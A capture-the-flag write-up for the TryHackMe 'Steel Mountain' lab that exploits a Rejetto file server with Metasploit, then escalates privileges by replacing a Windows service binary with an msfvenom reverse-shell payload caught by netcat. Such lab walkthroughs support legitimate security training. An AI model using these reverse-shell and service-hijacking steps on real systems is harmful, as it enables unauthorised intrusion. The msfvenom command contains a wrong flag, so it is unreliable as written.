Steel Mountain (THM) Writeup

Difficulty: Easy (Windows)

Machine Room: https://tryhackme.com/room/steelmountain

#NMAP:

-sV : Version Scan

-A : Aggressive Scan

-p- : Scan all ports TCP/UDP

-oN : Output of text

We first notice that port 135 and port 8080 are open.

Let’s browse.

Looking at the source page, we notice that the image has a name, and it is the first question.

As we said, door 8080 is open, so let’s navigate on it.

In the “Server Information” section we find an interesting thing, the version.

Well having the “Server Information” We can go find an exploit: D

Exploit found! First thing, open metasploit, and search Rejetto, use 0.

Ok we have all the preparations now, to insert what we need

Set things up, as you can see in the picture.And we are In!!!

And let’s go get the first flag! :D

Ok now navigate on it : https://github.com/PowerShellMafia/PowerSploit/blob/master/Privesc/PowerUp.ps1

PowerUp aims to be a clearinghouse for common Windows privilege escalation vectors that rely on misconfigurations. So copy the raw in your new file.

Now we can upload it.

To execute this using Meterpreter, I will type load powershell into meterpreter. Then I will enter powershell by entering powershell_shell.

Command: load powershell

powershell_shell

. .\Powerup.ps1

Invoke-Allchecks

Now we can see the “AdvancedSystemCareService9” service, the “CanRestart” is marked to true. By doing so we can enable and disable it as we wish. And if we notice well, the service also gives us the path.

Now we are able to create our own Payload .. Let’s go!

Command: msfvenom -p windows/shell_reverse_tcp LHOST=IP LPORT=PORT -e x86/shikata_ga_nai -f exe -e Overpower.exe

The service turned out to be unlisted (and could be exploited using this technique), however, in this case we instead exploited the weak file permissions on the service files.

Ok now Upload the Payload.

Note: For return in meterpreter just tap “CTRL+C”

#Privilege Escalation:

As we saw earlier that serve, which was running, we are able to stop it. And copy our payload inside the vulnerable path where that service is running.

Command: sc stop AdvancedSystemCareService9

We copy the payload into the path of the vulnerable service.

Command: copy Overpower.exe “\Program Files (x86)\IObit\Advanced SystemCare\Overpower.exe”

Now with netcat listen on the port you gave the payload.

Let’s restart the service! Command: sc start AdvancedSystemCareService9

And we are IN!!!!! Now get the root flag!

Root.

Thanks guys as always, I hope it was useful, for more info and to study OSCP I suggest you see the other writeups. Good luck my friends.

CompTIA Security + Certified | CEH Student | OSCP Student | eJPT Certified |